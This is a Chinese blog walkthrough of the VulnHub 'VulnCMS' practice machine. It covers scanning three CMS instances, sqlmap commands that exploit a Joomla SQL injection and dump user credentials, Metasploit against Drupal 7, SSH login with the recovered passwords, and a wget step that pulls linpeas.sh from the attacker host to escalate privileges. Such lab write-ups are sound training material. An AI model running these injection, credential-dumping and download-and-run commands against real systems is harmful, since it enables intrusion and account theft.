title: Vulnhub-VulnCMS
tags: Vulnhub
abbrlink: f37f8da4

date: 2022-12-19 09:42:41

存活

image-20221219094647183

kali 192.168.169.220
 靶机 192.168.169.230

靶机扫描

image-20221219094835504

22 80  5000 8081 9001

访问

80

image-20221219095002897

5000

image-20221219095032942

8081

image-20221219095113230

9001

image-20221219095248010

三个端口都是cms系统
5000(Wordpress)、8081(Joomla)、和 9001(Drupal 7)

漏洞利用

80

  • 首先扫一下目录

image-20221219095801759

  • 文件目录

image-20221219100032584

image-20221219100049410

image-20221219100104642

发现两个疑似用户名:Mobley 和 Elloit,并且说了暴力破解没什么用。

5000 (Wordpress)

  • 直接上wpscan扫描
wpscan --url  http://192.168.169.230:5000/  -e u,p

image-20221219100412795

  • 没什么有用的价值

8081 (Joomla)

  • 使用Joomscan扫一下
joomscan -u http://192.168.169.230:8081/  

image-20221219100952243

  • 有个sql注入

image-20221219101225564

image-20221219102220623

开始注入

sqlmap -u "http://192.168.169.230:8081//index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " --dbs --batch

image-20221219102811743

sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" --tables --batch

image-20221219102924082

sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" --columns --batch

image-20221219103013884

sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" -C "username,password,name,email" --dump --batch

image-20221219103057861

导出信息

sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]= &item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" --dump --dump-format html --batch

image-20221219103424127

虽然密码加密,但是 email 列有一个看起来像密码
账户:elliot
密码:5T3e!_M0un7i@N

9001(Drupal 7)

  • msf

image-20221219103854585

image-20221219104104531

  • 查看一些文件

image-20221219104206792

  • 有上面sql的信息,尝试ssh

image-20221219104932456

提权

  • kali利用Python开启http服务,靶机里下载脚本 linpeas.sh,获取信息

image-20221219105629246

  • 靶机使用wget下载
wget http://192.168.169.220/linpeas.sh

image-20221219105856728

  • 加权限,运行文件

image-20221219105939466

image-20221219110642453

  • tyrell用户的密码mR_R0bo7_i5_R3@!_登陆成功

image-20221219111229992

image-20221219111258811

image-20221219111342149

image-20221219111449790